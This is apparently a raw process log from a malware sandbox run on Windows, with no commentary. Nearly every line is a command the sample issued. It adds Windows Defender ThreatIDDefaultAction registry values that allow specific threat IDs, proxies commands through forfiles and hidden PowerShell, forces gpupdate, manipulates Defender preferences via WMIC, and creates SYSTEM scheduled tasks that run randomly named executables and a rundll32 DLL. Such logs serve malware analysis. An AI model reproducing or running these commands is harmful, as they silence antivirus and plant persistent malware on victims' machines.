C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "doZbz1"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iHAtfpaAUcCnRIDUD"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1324 -ip 1324
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 2236
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "iHAtfpaAUcCnRIDUD" /SC once /ST 00:03:32 /RU "SYSTEM" /TR "\"C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\QFkoGpe.exe\" O3 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "iHAtfpaAUcCnRIDUD"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\QFkoGpe.exe
C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\QFkoGpe.exe O3 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4384 -ip 4384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4384 -s 1344
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4652 --field-trial-handle=2404,i,5058296628872734279,15099324039230801251,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5432 --field-trial-handle=2404,i,5058296628872734279,15099324039230801251,131072 /prefetch:1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bsuAwLimisXNmJFuDt"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\dTyeYvmCU\VZxbMe.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yoGdnYnzlZOyEUZ" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "yoGdnYnzlZOyEUZ2" /F /xml "C:\Program Files (x86)\dTyeYvmCU\XaPtOKF.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "yoGdnYnzlZOyEUZ"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "yoGdnYnzlZOyEUZ"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe723ab58,0x7fffe723ab68,0x7fffe723ab78
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bUjWiYKnFLBNBg" /F /xml "C:\Program Files (x86)\EJgSdoUbjkoU2\OqBZyaR.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MXVPsGGZsUdpk2" /F /xml "C:\ProgramData\SFedefwyVZzcKDVB\cyZicEC.xml" /RU "SYSTEM"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=2320,i,2118105858505851151,17184989969443075646,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1744 --field-trial-handle=2320,i,2118105858505851151,17184989969443075646,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1976 --field-trial-handle=2320,i,2118105858505851151,17184989969443075646,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3064 --field-trial-handle=2320,i,2118105858505851151,17184989969443075646,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3080 --field-trial-handle=2320,i,2118105858505851151,17184989969443075646,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3712 --field-trial-handle=2320,i,2118105858505851151,17184989969443075646,131072 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "prMGXFkeeUTMdhmNg2" /F /xml "C:\Program Files (x86)\rDAvgYGuVEIABXmxEhR\QCkZvFM.xml" /RU "SYSTEM"
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "dFoJmIVNgWiokFVCHjs2" /F /xml "C:\Program Files (x86)\PyvCjIxDuxQTC\cuOYfjy.xml" /RU "SYSTEM"
C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\YsdiyzJB\bmmOwtb.exe
"C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\YsdiyzJB\bmmOwtb.exe" /S ZW
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4660 --field-trial-handle=2320,i,2118105858505851151,17184989969443075646,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4736 --field-trial-handle=2320,i,2118105858505851151,17184989969443075646,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4856 --field-trial-handle=2320,i,2118105858505851151,17184989969443075646,131072 /prefetch:1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
